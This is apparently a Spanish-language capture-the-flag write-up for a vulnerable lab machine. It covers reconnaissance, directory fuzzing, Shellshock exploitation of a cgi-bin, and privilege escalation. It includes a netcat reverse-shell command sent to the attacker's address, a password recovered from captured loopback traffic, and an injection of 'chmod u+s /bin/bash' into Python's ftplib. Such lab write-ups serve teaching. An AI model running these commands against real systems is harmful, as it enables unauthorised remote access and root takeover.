Hacemos el reconocimiento con nmap:
Y esta sería la página web que corre por el puerto 80:
Viendo el código fuente nos encontramos con esto:
Hacemos fuzzing web y nos encontramos con el directorio gate:
Seguimos haciendo fuzzing y nos encontramos con el directorio cerberus:
Y ahora si volvemos a hacer fuzzing, nos encontramos con el directorio tartarus (pero usando el diccionario common.txt):
Y dentro del código fuente tenemos esto:
De todos modos, si volvemos a hacer fuzzing desde la raíz pero usando el diccionario common.txt, vemos el directorio cgi-bin:
Y si hacemos fuzzing otra vez pero sobre el cgi-bin, vemos el directorio underworld:
Al tratarse de un cgi-bin, podemos pensar que estamos ante un shellshock, por lo que buscamos exploits en metasploit:
Establecemos la siguiente configuración en el exploit:
Y así nos debería quedar la configuración:
Y así debería funcionar, aunque podemos hacerlo de forma manual:
Nos lo bajamos:
Y ejecutamos el exploit de la siguiente manera:
php 34766.php -u http://192.168.0.72/cgi-bin/underworld/ -c "nc -e /bin/bash 192.168.0.63 443"
Y recibimos la conexión:
Vamos a descargar y ejecutar el pspy dentro de esta máquina para conocer si hay algo corriendo por detrás:
Y vemos que se está ejecutando un script con python2 dentro del directorio /opt:
Pero no tenemos permisos para acceder:
Pero sí podemos capturar el tráfico de red de este servicio usando tcpdump, por lo que primero listamos las interfaces de red:
Y ahora capturamos el tráfico de la interfaz .lo:
tcpdump -i lo -w captura.pcap
Y ahora este pcap vamos a compartirlo con mi máquina atacante para analizarlo con wireshark:
Y nos encontramos con una contraseña:
hades:PTpZTfU4vxgzvRBE
Y sabemos que hay otro usuario llamado hades, además de estar abierto el puerto 22:
Y tenemos acceso por ssh:
Y ahora sí tenemos acceso al directorio /opt:
Y vemos que podemos escribir dentro de este script:
Por tanto miramos a ver la librería ftplib para ver si la podemos editar e inyectar ahí un comando malicioso:
nano /usr/lib/python2.7/ftplib.py
Y al principio del todo añadimos la librería os para cambiar los permisos de la bash
import os os.system("chmod u+s /bin/bash")
































